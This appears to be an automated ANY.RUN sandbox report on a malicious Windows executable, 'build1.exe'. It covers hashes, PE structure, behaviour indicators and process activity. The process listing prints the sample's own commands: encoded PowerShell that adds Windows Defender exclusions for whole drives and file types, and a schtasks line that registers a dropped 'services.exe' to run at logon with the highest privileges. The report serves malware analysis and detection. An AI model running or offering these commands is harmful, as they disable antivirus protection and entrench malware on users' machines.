analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

build1.exe

Full analysis: https://app.any.run/tasks/a3818e92-d2b6-4fe1-90eb-edc0dcd767bc
Verdict: Malicious activity
Analysis date: January 15, 2022, 01:10:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5:

59E3874277ACECD7A9F528E8625FC8F6

SHA1:

AE9AA4DB8C15FF7C322B5879BEC7426419F52065

SHA256:

1EE7A34093CD73EBA01926AAAAE10260731E369E1AFD4BD27C98C5B150BF9C9A

SSDEEP:

196608:zX4CQF4oZ0x8+qCDsBrBVMMM79MwGP+DbDzOfbQYp:zHQWoZ0HqCDSBVMMM7GwbDS04

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2620)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2316)
      • cmd.exe (PID: 508)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2356)
  • SUSPICIOUS

    • Checks supported languages

      • powershell.exe (PID: 468)
      • cmd.exe (PID: 2316)
      • powershell.exe (PID: 2052)
      • build1.exe (PID: 748)
      • cmd.exe (PID: 2620)
      • cmd.exe (PID: 2804)
      • cmd.exe (PID: 508)
      • services.exe (PID: 1800)
      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 2200)
    • Reads the computer name

      • build1.exe (PID: 748)
      • powershell.exe (PID: 2052)
      • powershell.exe (PID: 468)
      • services.exe (PID: 1800)
      • powershell.exe (PID: 2200)
      • powershell.exe (PID: 2640)
    • Starts CMD.EXE for commands execution

      • build1.exe (PID: 748)
      • services.exe (PID: 1800)
    • Creates executable files which already exist in Windows

      • build1.exe (PID: 748)
    • Drops a file with too old compile date

      • build1.exe (PID: 748)
    • Creates files in the user directory

      • build1.exe (PID: 748)
    • Executable content was dropped or overwritten

      • build1.exe (PID: 748)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 468)
      • powershell.exe (PID: 2052)
      • powershell.exe (PID: 2640)
      • powershell.exe (PID: 2200)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 2052)
      • powershell.exe (PID: 468)
      • powershell.exe (PID: 2200)
      • powershell.exe (PID: 2640)
    • Reads the computer name

      • schtasks.exe (PID: 2356)
    • Checks supported languages

      • schtasks.exe (PID: 2356)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.2)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
PEType: PE32+
LinkerVersion: 6
CodeSize: 3584
InitializedDataSize: 2679296
UninitializedDataSize: -
EntryPoint: 0x8811e2
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_AMD64
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Jan-1970 00:00:00
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_AMD64
Number of sections: 7
Time date stamp: 01-Jan-1970 00:00:00
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00F0
Characteristics:
  • IMAGE_FILE_DEBUG_STRIPPED
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00000DD0
0x00000000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
0
.rdata
0x00002000
0x0028DB82
0x00000000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
0
.data
0x00290000
0x00000FEC
0x00000000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.pdata
0x00291000
0x0000009C
0x00000000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
0
.vmp0
0x00292000
0x0030EB4E
0x00000000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
0
.vmp1
0x005A1000
0x006AF33C
0x006AF400
IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ
7.93728
.rsrc
0x00C51000
0x000001F0
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.82385

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.85064
408
UNKNOWN
English - United States
RT_MANIFEST

Imports

USER32.dll
WTSAPI32.dll
kernel32.dll
msvcrt.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
12
Malicious processes
3
Suspicious processes
5

Behavior graph

Click at the process to see the details
start build1.exe no specs build1.exe cmd.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe schtasks.exe no specs cmd.exe no specs services.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1384"C:\Users\admin\AppData\Local\Temp\build1.exe" C:\Users\admin\AppData\Local\Temp\build1.exeExplorer.EXE
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
748"C:\Users\admin\AppData\Local\Temp\build1.exe" C:\Users\admin\AppData\Local\Temp\build1.exe
Explorer.EXE
User:
admin
Integrity Level:
HIGH
Exit code:
0
2316"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitC:\Windows\system32\cmd.exebuild1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2052powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
468powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2620"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\admin\AppData\Roaming\Microsoft\services.exe"C:\Windows\system32\cmd.exe
build1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2356schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\admin\AppData\Roaming\Microsoft\services.exe"C:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2804"cmd" cmd /c "C:\Users\admin\AppData\Roaming\Microsoft\services.exe"C:\Windows\system32\cmd.exebuild1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1800C:\Users\admin\AppData\Roaming\Microsoft\services.exeC:\Users\admin\AppData\Roaming\Microsoft\services.execmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
508"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitC:\Windows\system32\cmd.exeservices.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
5 373
Read events
5 285
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
8
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
748build1.exeC:\Users\admin\AppData\Roaming\Microsoft\services.exeexecutable
MD5:59E3874277ACECD7A9F528E8625FC8F6
SHA256:1EE7A34093CD73EBA01926AAAAE10260731E369E1AFD4BD27C98C5B150BF9C9A
468powershell.exeC:\Users\admin\AppData\Local\Temp\o4or2gl3.end.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2052powershell.exeC:\Users\admin\AppData\Local\Temp\jk5fwwrw.202.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2052powershell.exeC:\Users\admin\AppData\Local\Temp\0m0u142d.uhj.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2200powershell.exeC:\Users\admin\AppData\Local\Temp\i1f3evja.og1.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
468powershell.exeC:\Users\admin\AppData\Local\Temp\gd2040r5.awx.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2640powershell.exeC:\Users\admin\AppData\Local\Temp\irnpi514.1yu.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2640powershell.exeC:\Users\admin\AppData\Local\Temp\hyi4jqcj.5um.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2200powershell.exeC:\Users\admin\AppData\Local\Temp\cubwidox.uj2.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.2:53
whitelisted

DNS requests

Domain
IP
Reputation
www.microsoft.com
whitelisted

Threats

No threats detected
No debug info